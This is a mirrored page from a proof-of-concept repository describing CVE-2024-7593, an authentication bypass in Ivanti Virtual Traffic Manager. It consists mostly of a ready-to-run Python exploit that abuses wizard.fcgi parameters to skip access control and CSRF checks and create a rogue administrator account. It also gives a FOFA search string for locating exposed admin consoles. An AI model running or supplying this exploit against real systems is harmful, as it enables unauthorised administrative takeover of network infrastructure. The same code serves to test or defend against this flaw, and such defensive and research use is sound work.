mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
54 lines
1.6 KiB
Markdown
54 lines
1.6 KiB
Markdown
# Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593)
|
||
|
||
Ivanti Virtual Traffic Manager (vTM)多个版本存在身份验证绕过漏洞(CVE-2024-7593),由于身份验证算法的错误实现,导致未经身份验证的远程攻击者绕过面向互联网的vTM管理控制台上的身份验证,未授权创建管理用户。
|
||
|
||
## fofa
|
||
|
||
```javascript
|
||
"Pulse Secure vTM Administration Server"
|
||
```
|
||
|
||
## poc
|
||
|
||
```python
|
||
import requests
|
||
|
||
# Set to target address
|
||
admin_portal = 'https://1.1.1.1:9090'
|
||
|
||
# User to create
|
||
new_admin_name = 'ldwkadmin'
|
||
new_admin_password = 'ldwkadmin1234'
|
||
|
||
requests.packages.urllib3.disable_warnings()
|
||
session = requests.Session()
|
||
|
||
# Setting 'error' bypasses access control for wizard.fcgi.
|
||
# wizard.fcgi can load any section in the web interface.
|
||
params = { 'error': 1,
|
||
'section': 'Access Management:LocalUsers' }
|
||
|
||
# Create new user request
|
||
# _form_submitted to bypass CSRF
|
||
data = { '_form_submitted': 'form',
|
||
'create_user': 'Create',
|
||
'group': 'admin',
|
||
'newusername': new_admin_name,
|
||
'password1': new_admin_password,
|
||
'password2': new_admin_password }
|
||
|
||
# Post request
|
||
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)
|
||
|
||
# View response
|
||
content = r.content.decode('utf-8')
|
||
print(content)
|
||
|
||
if r.status_code == 200 and '<title>2<' in content:
|
||
print("New user request sent")
|
||
print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
|
||
else:
|
||
print("Unable to create new user")
|
||
```
|
||
|